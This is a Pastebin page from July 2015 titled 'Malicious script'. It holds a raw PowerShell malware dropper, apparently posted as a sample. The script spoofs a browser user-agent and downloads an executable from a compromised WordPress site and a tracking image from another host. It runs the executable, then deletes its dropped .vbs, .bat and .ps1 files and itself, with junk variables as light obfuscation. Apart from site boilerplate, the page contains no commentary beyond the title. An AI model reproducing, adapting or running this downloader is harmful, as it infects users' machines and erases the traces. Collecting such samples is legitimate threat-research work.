SHARE
TWEET

Malicious script

dynamoo Jul 8th, 2015 276 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $ujdkwq = 'jqwdb';
  2. $stat = 'ht'+'tp://'+''+'savepic.su/5757956.jpg';
  3. $ggtt = 'http://bluemagicwarranty.com/wp-includes/theme-compat/getrichtoday.exe';
  4. $pths = 'C:\Users\PSPUBWS\AppData\Local\Temp\';
  5. $wehs = '26417';
  6. $nnm = '8';
  7. $ajsghdjas='absghjdasjgdas';
  8. $asdhjassad='2ygeqwgheqwgjhegqjwgqej sad';
  9. $down = New-Object System.Net.WebClient;
  10. $asdasdas='2geyu2ty1tyeu12g2eg e';
  11. $file = $pths+$nnm+'.exe';
  12. $statsfile = $pths+'444.jpg';
  13. $down.headers[''+'User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
  14. $dasdw='asdgjasd';
  15. $down.DownloadFile($ggtt,$file);
  16. $down.DownloadFile($stat,$statsfile);
  17. $asndjkashdas='hqugdhjgqw hj2gjh1gd hj12ghej1';
  18. $ScriptDir = $MyInvocation.ScriptName;
  19. $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
  20. $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'jpg';
  21. $btFilePath = $pths+$wehs+'.'+'b'+'at';
  22. $psFilePath = $pths+$wehs+'.'+'ps'+'1';
  23. $asdhjqgwdq='qhwgdjqwghdjqw';
  24. $qwbhg21jd21h='jakshdjhagsdasd';
  25. Start-Sleep -s 13;
  26. cmd.exe /c  $file;    
  27. $file1 = gci $vbsFilePath -Force
  28. $nqjwdhgjqwd='qvdhqgwjdgwq';
  29. $file2 = gci $btFilePath -Force
  30. $file3 = gci $psFilePath -Force
  31. $kasldds = $vbsFilePath
  32. If (Test-Path $kasldds){ Remove-Item $kasldds }
  33. If (Test-Path $btFilePath){ Remove-Item $btFilePath }
  34. If (Test-Path $statFilePath){ Remove-Item $statFilePath }
  35. $asbdhjags = 'jahdjkhdjk21 21hjkhe jkhsakhd assd';
  36. If (Test-Path $file){ Remove-Item $file }
  37. Remove-Item $MyINvocation.InvocationName
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top